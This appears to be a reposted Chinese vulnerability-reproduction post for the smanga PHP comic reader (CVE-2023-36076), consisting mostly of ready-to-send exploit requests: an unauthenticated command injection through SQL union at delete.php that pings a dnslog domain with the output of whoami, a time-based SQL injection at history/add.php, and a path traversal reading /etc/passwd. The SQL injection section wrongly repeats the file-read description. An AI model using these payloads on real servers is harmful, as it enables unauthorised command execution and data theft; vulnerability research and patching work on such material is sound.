本人非原创漏洞作者,文章仅作为知识分享用
如有侵权,联系删除
产品简介
无需配置,docker直装的漫画流媒体阅读工具。以emby plex为灵感,为解决漫画阅读需求而开发的漫画阅读器。在windows环境部署smanga安装环境面板,首先安装小皮面板,下载smanga项目,导入数据库,登录smanga,windows部署smanga。
开发语言:PHP
GitHub:https://github.com/lkw199711/smanga
漏洞描述
/php/manga/delete.php接口处存在未授权远程代码执行漏洞,攻击者可在目标主机执行任意命令,获取服务器权限。
影响版本
smanga ≤ V3.2.7
空间测绘
回复“CVE-2023-36076”获取空间测绘搜索语句
漏洞利用
POC
POST /php/manga/delete.php
mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '";ping -c 3 `whoami`.evvj80.dnslog.cn;"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true
1.发生请求
2.dnslog收到回显
SQL注入
漏洞描述
/php/get-file-flow.php接口处file参数没有进行过滤,存在路径遍历,造成任意文件读取漏洞,未授权的攻击者可读取配置文件。
影响版本
smanga ≤ V3.2.7
漏洞利用
POC
POST /php/history/add.php
chapterCover=1&chapterId=1&chapterName=1&chatpterPath=1&chaptertype=image&keyword=1&mangaCover=undefined&mangaId=1&mangaName=&mediaId=if(now()=sysdate()%2Csleep(3)%2C0)×tamp=12123123&userId=1
任意文件读取
漏洞描述
/php/get-file-flow.php接口处file参数没有进行过滤,存在路径遍历,造成任意文件读取漏洞,未授权的攻击者可读取配置文件。
影响版本
smanga ≤ V3.2.7
漏洞利用
POC
POST /php/get-file-flow.php
file=../../../../../../../../etc/passwd
参考链接
https://nvd.nist.gov/vuln/detail/CVE-2023-36076
https://github.com/lkw199711/smanga/issues/100
回复“CVE-2023-36076”获取空间测绘语句
仅供学习交流,勿用作违法犯罪
原文始发于微信公众号(不够安全):CVE-2023-36076:smanga漫画阅读系统 远程命令执行 漏洞复现 附POC 附SQL注入和任意文件读取
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论